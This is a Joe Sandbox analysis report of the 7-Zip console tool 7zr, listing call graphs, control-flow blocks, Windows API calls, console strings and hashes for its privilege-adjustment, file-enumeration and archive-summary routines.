76631->76632 76633 5d55c7 76632->76633 76634 5d5711 76633->76634 76635 5d56e0 76634->76635 76636 5d5721 76634->76636 76635->76618 76640 5a2881 malloc _CxxThrowException free memcpy _CxxThrowException 76635->76640 76637 5a28a1 5 API calls 76636->76637 76638 5d572b 76637->76638 76641 5d55cd 6 API calls 76638->76641 76640->76620 76641->76635 76642->76286 76643->76290 76644->76292 76645->76294 76646->76296 77261 6269d0 77262 6269d7 malloc 77261->77262 77263 6269d4 77261->77263 77264 5b1368 77266 5b136d 77264->77266 77267 5b138c 77266->77267 77270 637d80 WaitForSingleObject 77266->77270 77273 5df745 77266->77273 77277 637ea0 SetEvent GetLastError 77266->77277 77271 637d98 77270->77271 77272 637d8e GetLastError 77270->77272 77271->77266 77272->77271 77274 5df74f __EH_prolog 77273->77274 77278 5df784 77274->77278 77276 5df765 77276->77266 77277->77266 77279 5df78e __EH_prolog 77278->77279 77280 5b12d4 4 API calls 77279->77280 77281 5df7c7 77280->77281 77282 5b12d4 4 API calls 77281->77282 77283 5df7d4 77282->77283 77284 5df871 77283->77284 77287 626b23 VirtualAlloc 77283->77287 77288 5ac4d6 77283->77288 77284->77276 77287->77284 77292 5ac4e9 77288->77292 77289 5ac6f3 77289->77284 77290 5b111c 10 API calls 77290->77292 77291 5b11b4 107 API calls 77291->77292 77292->77289 77292->77290 77292->77291 77293 5ac695 memmove 77292->77293 77293->77292 77294 5ebf67 77295 5ebf74 77294->77295 77296 5ebf85 77294->77296 77295->77296 77300 5ebf8c 77295->77300 77301 5ebf96 __EH_prolog 77300->77301 77317 5ed144 77301->77317 77305 5ebfd0 77324 5a1e40 free 77305->77324 77307 5ebfdb 77325 5a1e40 free 77307->77325 77309 5ebfe6 77326 5ec072 free ctype 77309->77326 77311 5ebff4 77327 5baafa free VariantClear ctype 77311->77327 77313 5ec023 77328 5c73d2 free VariantClear __EH_prolog ctype 77313->77328 77315 5ebf7f 77316 5a1e40 free 77315->77316 77316->77296 77319 5ed14e __EH_prolog 77317->77319 77318 5ed1b7 free 77320 5ed180 77318->77320 77319->77318 77329 5e8e04 memset 77320->77329 77322 5ebfc5 77323 5a1e40 free 77322->77323 77323->77305 77324->77307 77325->77309 77326->77311 77327->77313 77328->77315 77329->77322 77330 5a7b20 77333 5a7ab2 77330->77333 77334 5a7ac5 77333->77334 77335 5a759a 12 API calls 77334->77335 77336 5a7ade 77335->77336 77337 5a7b03 77336->77337 77338 5a7aeb SetFileTime 77336->77338 77341 5a7919 77337->77341 77338->77337 77342 5a7aac 77341->77342 77343 5a793c 77341->77343 77343->77342 77344 5a7945 DeviceIoControl 77343->77344 77345 5a7969 77344->77345 77346 5a79e6 77344->77346 77345->77346 77352 5a79a7 77345->77352 77347 5a79ef DeviceIoControl 77346->77347 77350 5a7a14 77346->77350 77348 5a7a22 DeviceIoControl 77347->77348 77347->77350 77349 5a7a44 DeviceIoControl 77348->77349 77348->77350 77349->77350 77350->77342 77358 5a780d 8 API calls ctype 77350->77358 77357 5a9252 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 77352->77357 77353 5a7aa5 77355 5a77de 5 API calls 77353->77355 77355->77342 77356 5a79d0 77356->77346 77357->77356 77358->77353 77359 5dc2e6 77360 5dc52f 77359->77360 77363 5d544f SetConsoleCtrlHandler 77360->77363 77362 5dc53b 77363->77362

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1073 5a9313-5a9338 GetCurrentProcess OpenProcessToken 1074 5a933a-5a934a LookupPrivilegeValueW 1073->1074 1075 5a9390 1073->1075 1077 5a934c-5a9370 AdjustTokenPrivileges 1074->1077 1078 5a9382 1074->1078 1076 5a9393-5a9398 1075->1076 1077->1078 1079 5a9372-5a9380 GetLastError 1077->1079 1080 5a9385-5a938e CloseHandle 1078->1080 1079->1080 1080->1076
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000020,005B1EC5,?,7597AB50,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9329
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9330
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 005A9342
                                        • AdjustTokenPrivileges.KERNELBASE(005B1EC5,00000000,?,00000000,00000000,00000000), ref: 005A9368
                                        • GetLastError.KERNEL32 ref: 005A9372
                                        • CloseHandle.KERNELBASE(005B1EC5,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9388
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeRestorePrivilege
                                        • API String ID: 3398352648-1684392131
                                        • Opcode ID: 93fab6978dd92a2f6d259e92150f33395353d616a8c74d9709c4f3e5deebc6e9
                                        • Instruction ID: 0e65a29ba84a04adc6e71b163a93e5751269f5fd8478b095bc58e47f3b5251b3
                                        • Opcode Fuzzy Hash: 93fab6978dd92a2f6d259e92150f33395353d616a8c74d9709c4f3e5deebc6e9
                                        • Instruction Fuzzy Hash: E801C07A946228ABCB605FF59C49BDE7F7CAF03754F045565E441E2280D6728608C7A0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1081 5b3d66-5b3d9c call 63fb10 GetCurrentProcess call 5b3e04 OpenProcessToken 1086 5b3d9e-5b3dbe LookupPrivilegeValueW 1081->1086 1087 5b3de3-5b3dfe call 5b3e04 1081->1087 1086->1087 1088 5b3dc0-5b3dd3 AdjustTokenPrivileges 1086->1088 1088->1087 1090 5b3dd5-5b3de1 GetLastError 1088->1090 1090->1087
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B3D6B
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D7D
                                        • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D94
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005B3DB6
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DCB
                                        • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 3475889169-2333288578
                                        • Opcode ID: df5b664a5bf0a59c476ab3f0343ef71543160b1a893792588bfbbd78320b8d17
                                        • Instruction ID: 749513328590fcecf552839362cf8d5b2dccbb6ae467c18378458f6410fd4c6f
                                        • Opcode Fuzzy Hash: df5b664a5bf0a59c476ab3f0343ef71543160b1a893792588bfbbd78320b8d17
                                        • Instruction Fuzzy Hash: DC1152B59411199FDB10EFA5DC89AFEFB7DFB05754F000529E412F2290DB319A08CA60
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E81F1
                                          • Part of subcall function 005EF749: _CxxThrowException.MSVCRT(?,00654A58), ref: 005EF792
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-3916222277
                                        • Opcode ID: c62de758f435c1793a6c261160cd9cd80bdff9c0490b58f73eaba97951711286
                                        • Instruction ID: 672cec5cc745d6755609fb1f93e8f3cc34f4b3080cd0d839c23e6f4a8c224789
                                        • Opcode Fuzzy Hash: c62de758f435c1793a6c261160cd9cd80bdff9c0490b58f73eaba97951711286
                                        • Instruction Fuzzy Hash: 5B92A13090028ADFDF19DFA9C944BBEBFB1BF45304F244499E889AB292CB719D45CB51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A686D
                                          • Part of subcall function 005A6848: FindClose.KERNELBASE(00000000,?,005A6880), ref: 005A6853
                                        • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 005A68A5
                                        • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 005A68DE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseH_prolog
                                        • String ID:
                                        • API String ID: 3371352514-0
                                        • Opcode ID: cc67faf20f2ea45e1d9eee027cb0b30ad5481aeaeb06ae30c3718de11279074b
                                        • Instruction ID: 72fa743a6e3a4941edddef59aaba93cff39a5fb9c2c2da5d0a4322f80d7167ef
                                        • Opcode Fuzzy Hash: cc67faf20f2ea45e1d9eee027cb0b30ad5481aeaeb06ae30c3718de11279074b
                                        • Instruction Fuzzy Hash: B111903150020A9BCB10EF64D8555FDBFB9FF52324F144629E9A157292DB358E85DB40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 5da013-5da01a 1 5da37a-5da544 call 5e04d2 call 5a1524 call 5e04d2 call 5a1524 call 5a1e0c 0->1 2 5da020-5da02d call 5b1ac8 0->2 60 5da546-5da54f call 5db0fa 1->60 61 5da551 1->61 8 5da22e-5da235 2->8 9 5da033-5da03a 2->9 10 5da23b-5da24d call 5db4f6 8->10 11 5da367-5da375 call 5db55f 8->11 13 5da03c-5da042 9->13 14 5da054-5da089 call 5d92d3 9->14 26 5da24f-5da253 10->26 27 5da259-5da2fb call 5c7ebb call 5a27bb call 5a26dd call 5c3d70 call 5dad99 call 5a27bb 10->27 25 5dac23-5dac2a 11->25 13->14 18 5da044-5da04f call 5a30ea 13->18 29 5da099 14->29 30 5da08b-5da091 14->30 18->14 31 5dac2c-5dac33 25->31 32 5dac3a-5dac66 call 5db96d call 5a1e40 call 5c3247 25->32 26->27 92 5da2fd 27->92 93 5da303-5da362 call 5db6ab call 5d2db9 call 5a1e40 * 2 call 5dbff8 27->93 36 5da09d-5da0de call 5a2fec call 5db369 29->36 30->29 35 5da093-5da097 30->35 31->32 38 5dac35 31->38 70 5dac6e-5dacb5 call 5a1e40 call 5a11c2 call 5dbe0c call 5d2db9 32->70 71 5dac68-5dac6a 32->71 35->36 55 5da0ea-5da0fa 36->55 56 5da0e0-5da0e4 36->56 43 5dac35 call 5db988 38->43 43->32 62 5da10d 55->62 63 5da0fc-5da102 55->63 56->55 67 5da553-5da55c 60->67 61->67 69 5da114-5da19e call 5a2fec call 5c7ebb call 5dad99 62->69 63->62 68 5da104-5da10b 63->68 74 5da55e-5da560 67->74 75 5da564-5da5c1 call 5a2fec call 5db277 67->75 68->69 101 5da1a2 call 5cf8e0 69->101 71->70 74->75 98 5da5cd-5da652 call 5dad06 call 5dbf3e call 5b3a29 call 5a2e04 call 5c4345 75->98 99 5da5c3-5da5c7 75->99 92->93 93->25 136 5da654-5da671 call 5c375c call 5db96d 98->136 137 5da676-5da6c8 call 5c2096 98->137 99->98 105 5da1a7-5da1b1 101->105 110 5da1c0-5da1c9 105->110 111 5da1b3-5da1bb call 5dc7d7 105->111 116 5da1cb 110->116 117 5da1d1-5da229 call 5db6ab call 5d2db9 call 5a1e40 call 5dbfa4 call 5d940b 110->117 111->110 116->117 117->25 136->137 143 5da6cd-5da6d6 137->143 147 5da6d8-5da6dd call 5dc7d7 143->147 148 5da6e2-5da6e5 143->148 147->148 150 5da72e-5da73a 148->150 151 5da6e7-5da6ee 148->151 154 5da73c-5da74a call 5a1fa0 150->154 155 5da79e-5da7aa 150->155 152 5da6f0-5da71d call 5a1fa0 fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 151->152 153 5da722-5da725 151->153 152->153 153->150 159 5da727 153->159 166 5da74c-5da753 154->166 167 5da755-5da799 fputs call 5a2201 call 5a1fa0 fputs call 5a2201 call 5a1fa0 154->167 157 5da7ac-5da7b2 155->157 158 5da7d9-5da7e5 155->158 157->158 165 5da7b4-5da7d4 fputs call 5a2201 call 5a1fa0 157->165 162 5da818-5da81a 158->162 163 5da7e7-5da7ed 158->163 159->150 168 5da899-5da8a5 162->168 171 5da81c-5da82b 162->171 163->168 169 5da7f3-5da813 fputs call 5a2201 call 5a1fa0 163->169 165->158 166->155 166->167 167->155 175 5da8e9-5da8ed 168->175 176 5da8a7-5da8ad 168->176 169->162 178 5da82d-5da84c fputs call 5a2201 call 5a1fa0 171->178 179 5da851-5da85d 171->179 183 5da8ef 175->183 188 5da8f6-5da8f8 175->188 176->183 184 5da8af-5da8c2 call 5a1fa0 176->184 178->179 179->168 187 5da85f-5da872 call 5a1fa0 179->187 183->188 184->183 211 5da8c4-5da8e4 fputs call 5a2201 call 5a1fa0 184->211 187->168 206 5da874-5da894 fputs call 5a2201 call 5a1fa0 187->206 190 5daaaf-5daaeb call 5c43b3 call 5a1e40 call 5dc104 call 5dad82 188->190 191 5da8fe-5da90a 188->191 247 5dac0b-5dac1e call 5d2db9 * 2 190->247 248 5daaf1-5daaf7 190->248 199 5da910-5da91f 191->199 200 5daa73-5daa89 call 5a1fa0 191->200 199->200 208 5da925-5da929 199->208 200->190 223 5daa8b-5daaaa fputs call 5a2201 call 5a1fa0 200->223 206->168 208->190 214 5da92f-5da93d 208->214 211->175 220 5da93f-5da964 fputs call 5a2201 call 5a1fa0 214->220 221 5da96a-5da971 214->221 220->221 228 5da98f-5da9a8 fputs call 5a2201 221->228 229 5da973-5da97a 221->229 223->190 241 5da9ad-5da9bd call 5a1fa0 228->241 229->228 234 5da97c-5da982 229->234 234->228 239 5da984-5da98d 234->239 239->228 245 5daa06-5daa1f fputs call 5a2201 239->245 241->245 250 5da9bf-5daa01 fputs call 5a2201 call 5a1fa0 fputs call 5a2201 call 5a1fa0 241->250 252 5daa24-5daa29 call 5a1fa0 245->252 247->25 248->247 250->245 259 5daa2e-5daa4b fputs call 5a2201 252->259 262 5daa50-5daa5b call 5a1fa0 259->262 262->190 268 5daa5d-5daa71 call 5a1fa0 call 5d710e 262->268 268->190
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$ExceptionThrow
                                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&f$p&f$N
                                        • API String ID: 3665150552-1696439099
                                        • Opcode ID: c4aa830751c8d45632ab42405af528d6ca29ec1736608773db3fb0b9fb8490a4
                                        • Instruction ID: eb13a5aad3b65b8e43aaf3c7a36b68774344ce8ba1f31241281b8593be363d09
                                        • Opcode Fuzzy Hash: c4aa830751c8d45632ab42405af528d6ca29ec1736608773db3fb0b9fb8490a4
                                        • Instruction Fuzzy Hash: 03526A30904259DFDF26DBA8C899BDEBFB6BF85300F14419AE44967291DB706E84CF11

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 274 5da42c-5da433 275 5da449-5da4df call 5d545d call 5a2e04 call 5c1858 call 5a1e40 274->275 276 5da435-5da444 fputs call 5a1fa0 274->276 286 5da4ee-5da4f1 275->286 287 5da4e1-5da4e9 call 5dc7d7 275->287 276->275 288 5da50e-5da520 call 5dc73e 286->288 289 5da4f3-5da4fa 286->289 287->286 295 5dac0b-5dac2a call 5d2db9 * 2 288->295 296 5da526-5da544 call 5a1e0c 288->296 289->288 291 5da4fc-5da509 call 5d57fb 289->291 291->288 306 5dac2c-5dac33 295->306 307 5dac3a-5dac66 call 5db96d call 5a1e40 call 5c3247 295->307 303 5da546-5da54f call 5db0fa 296->303 304 5da551 296->304 309 5da553-5da55c 303->309 304->309 306->307 310 5dac35 call 5db988 306->310 327 5dac6e-5dacb5 call 5a1e40 call 5a11c2 call 5dbe0c call 5d2db9 307->327 328 5dac68-5dac6a 307->328 313 5da55e-5da560 309->313 314 5da564-5da5c1 call 5a2fec call 5db277 309->314 310->307 313->314 325 5da5cd-5da652 call 5dad06 call 5dbf3e call 5b3a29 call 5a2e04 call 5c4345 314->325 326 5da5c3-5da5c7 314->326 348 5da654-5da671 call 5c375c call 5db96d 325->348 349 5da676-5da6d6 call 5c2096 325->349 326->325 328->327 348->349 355 5da6d8-5da6dd call 5dc7d7 349->355 356 5da6e2-5da6e5 349->356 355->356 358 5da72e-5da73a 356->358 359 5da6e7-5da6ee 356->359 362 5da73c-5da74a call 5a1fa0 358->362 363 5da79e-5da7aa 358->363 360 5da6f0-5da71d call 5a1fa0 fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 359->360 361 5da722-5da725 359->361 360->361 361->358 367 5da727 361->367 374 5da74c-5da753 362->374 375 5da755-5da799 fputs call 5a2201 call 5a1fa0 fputs call 5a2201 call 5a1fa0 362->375 365 5da7ac-5da7b2 363->365 366 5da7d9-5da7e5 363->366 365->366 373 5da7b4-5da7d4 fputs call 5a2201 call 5a1fa0 365->373 370 5da818-5da81a 366->370 371 5da7e7-5da7ed 366->371 367->358 376 5da899-5da8a5 370->376 379 5da81c-5da82b 370->379 371->376 377 5da7f3-5da813 fputs call 5a2201 call 5a1fa0 371->377 373->366 374->363 374->375 375->363 383 5da8e9-5da8ed 376->383 384 5da8a7-5da8ad 376->384 377->370 386 5da82d-5da84c fputs call 5a2201 call 5a1fa0 379->386 387 5da851-5da85d 379->387 391 5da8ef 383->391 396 5da8f6-5da8f8 383->396 384->391 392 5da8af-5da8c2 call 5a1fa0 384->392 386->387 387->376 395 5da85f-5da872 call 5a1fa0 387->395 391->396 392->391 419 5da8c4-5da8e4 fputs call 5a2201 call 5a1fa0 392->419 395->376 414 5da874-5da894 fputs call 5a2201 call 5a1fa0 395->414 398 5daaaf-5daaeb call 5c43b3 call 5a1e40 call 5dc104 call 5dad82 396->398 399 5da8fe-5da90a 396->399 398->295 455 5daaf1-5daaf7 398->455 407 5da910-5da91f 399->407 408 5daa73-5daa89 call 5a1fa0 399->408 407->408 416 5da925-5da929 407->416 408->398 431 5daa8b-5daaaa fputs call 5a2201 call 5a1fa0 408->431 414->376 416->398 422 5da92f-5da93d 416->422 419->383 428 5da93f-5da964 fputs call 5a2201 call 5a1fa0 422->428 429 5da96a-5da971 422->429 428->429 436 5da98f-5da9a8 fputs call 5a2201 429->436 437 5da973-5da97a 429->437 431->398 449 5da9ad-5da9bd call 5a1fa0 436->449 437->436 442 5da97c-5da982 437->442 442->436 447 5da984-5da98d 442->447 447->436 453 5daa06-5daa4b fputs call 5a2201 call 5a1fa0 fputs call 5a2201 447->453 449->453 457 5da9bf-5daa01 fputs call 5a2201 call 5a1fa0 fputs call 5a2201 call 5a1fa0 449->457 466 5daa50-5daa5b call 5a1fa0 453->466 455->295 457->453 466->398 472 5daa5d-5daa71 call 5a1fa0 call 5d710e 466->472 472->398
                                        APIs
                                        • fputs.MSVCRT(Scanning the drive for archives:), ref: 005DA43E
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputcfputs
                                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&f$p&f$!"$N
                                        • API String ID: 269475090-2754028480
                                        • Opcode ID: 26220e11c07190d60f4a15374158beaadace8e6e3031ed6bb8a11d35441988b9
                                        • Instruction ID: 144decfc9b0020281b8c30e0799d285b3421665ec17c5a0bb30e79706543e263
                                        • Opcode Fuzzy Hash: 26220e11c07190d60f4a15374158beaadace8e6e3031ed6bb8a11d35441988b9
                                        • Instruction Fuzzy Hash: EE226C30904259DFDF26EBA8C859BDEBFB6BF85300F14419BE44966291DB706E84CF11

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 478 5d993d-5d9950 call 5db5b1 481 5d9963-5d997e call 5b1f33 478->481 482 5d9952-5d995e call 5a1fb3 478->482 486 5d998f-5d9998 481->486 487 5d9980-5d998a 481->487 482->481 488 5d99a8 486->488 489 5d999a-5d99a6 486->489 487->486 490 5d99ab-5d99b5 488->490 489->488 489->490 491 5d99d5-5d9a04 call 5a1e0c call 5dacb6 490->491 492 5d99b7-5d99cc GetStdHandle GetConsoleScreenBufferInfo 490->492 500 5d9a0c-5d9a24 call 5c7b48 491->500 501 5d9a06-5d9a08 491->501 492->491 493 5d99ce-5d99d2 492->493 493->491 503 5d9a29-5d9a48 call 5db96d call 5c7018 call 5b1aa4 500->503 501->500 510 5d9a7c-5d9aa8 call 5cddb5 503->510 511 5d9a4a-5d9a4c 503->511 517 5d9aaa-5d9abb _CxxThrowException 510->517 518 5d9ac0-5d9ade 510->518 513 5d9a4e-5d9a55 511->513 514 5d9a66-5d9a77 _CxxThrowException 511->514 513->514 516 5d9a57-5d9a64 call 5b1ac8 513->516 514->510 516->510 516->514 517->518 520 5d9b3a-5d9b55 518->520 521 5d9ae0-5d9b04 call 5c7dd7 518->521 525 5d9b5c-5d9ba4 call 5a1fa0 fputs call 5a1fa0 strlen * 2 520->525 526 5d9b57 520->526 529 5d9bfa-5d9c0b _CxxThrowException 521->529 530 5d9b0a-5d9b0e 521->530 539 5d9baa-5d9be4 fputs fputc 525->539 540 5d9e25-5d9e4d call 5a1fa0 fputs call 5a1fa0 525->540 526->525 533 5d9c10 529->533 530->529 532 5d9b14-5d9b38 call 5dc077 call 5a1e40 530->532 532->520 532->521 536 5d9c12-5d9c25 533->536 543 5d9c27-5d9c33 536->543 544 5d9be6-5d9bf0 536->544 539->543 539->544 556 5d9f0c-5d9f34 call 5a1fa0 fputs call 5a1fa0 540->556 557 5d9e53 540->557 551 5d9c35-5d9c3d 543->551 552 5d9c81-5d9cb1 call 5db67d call 5a2e04 543->552 544->533 547 5d9bf2-5d9bf8 544->547 547->536 554 5d9c3f-5d9c4a 551->554 555 5d9c6b-5d9c80 call 5a21d8 551->555 593 5d9d10-5d9d28 call 5db67d 552->593 594 5d9cb3-5d9cb7 552->594 558 5d9c4c-5d9c52 554->558 559 5d9c54 554->559 555->552 579 5d9f3a 556->579 580 5dac23-5dac2a 556->580 562 5d9e5a-5d9e6f call 5db650 557->562 565 5d9c56-5d9c69 558->565 559->565 572 5d9e7b-5d9e7e call 5a21d8 562->572 573 5d9e71-5d9e79 562->573 565->554 565->555 585 5d9e83-5d9f06 call 5dbde4 fputs call 5a1fa0 572->585 573->585 586 5d9f41-5d9f9d call 5db650 call 5db5e9 call 5dbde4 fputs call 5a1fa0 579->586 581 5dac2c-5dac33 580->581 582 5dac3a-5dac66 call 5db96d call 5a1e40 call 5c3247 580->582 581->582 587 5dac35 call 5db988 581->587 619 5dac6e-5dacb5 call 5a1e40 call 5a11c2 call 5dbe0c call 5d2db9 582->619 620 5dac68-5dac6a 582->620 585->556 585->562 662 5d9f9f 586->662 587->582 617 5d9d4b-5d9d53 593->617 618 5d9d2a-5d9d4a fputs call 5a21d8 593->618 599 5d9cb9-5d9cbc call 5a315e 594->599 600 5d9cc1-5d9cdd call 5a31e5 594->600 599->600 613 5d9cdf-5d9d00 call 5a3221 call 5a31e5 call 5a1089 600->613 614 5d9d05-5d9d0e 600->614 613->614 614->593 614->594 625 5d9dff-5d9e1f call 5a1fa0 call 5a1e40 617->625 626 5d9d59-5d9d5d 617->626 618->617 620->619 625->539 625->540 632 5d9d5f-5d9d6d fputs 626->632 633 5d9d6e-5d9d82 626->633 632->633 638 5d9d84-5d9d88 633->638 639 5d9df0-5d9df9 633->639 645 5d9d8a-5d9d94 638->645 646 5d9d95-5d9d9f 638->646 639->625 639->626 645->646 652 5d9da5-5d9db1 646->652 653 5d9da1-5d9da3 646->653 660 5d9db8 652->660 661 5d9db3-5d9db6 652->661 653->652 659 5d9dd8-5d9dee 653->659 659->638 659->639 665 5d9dbb-5d9dce 660->665 661->665 662->580 670 5d9dd5 665->670 671 5d9dd0-5d9dd3 665->671 670->659 671->659
                                        APIs
                                          • Part of subcall function 005DB5B1: fputs.MSVCRT ref: 005DB5CA
                                          • Part of subcall function 005DB5B1: fputs.MSVCRT ref: 005DB5E1
                                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 005D99BD
                                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 005D99C4
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005D9A77
                                        • _CxxThrowException.MSVCRT(?,006555B8), ref: 005D9ABB
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                                        • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&f$p&f$N
                                        • API String ID: 377453556-746994273
                                        • Opcode ID: bbb72a3a0dd79dd50d68416de2f6a0c6060ac9f8af2ed012839c3eac67d5de76
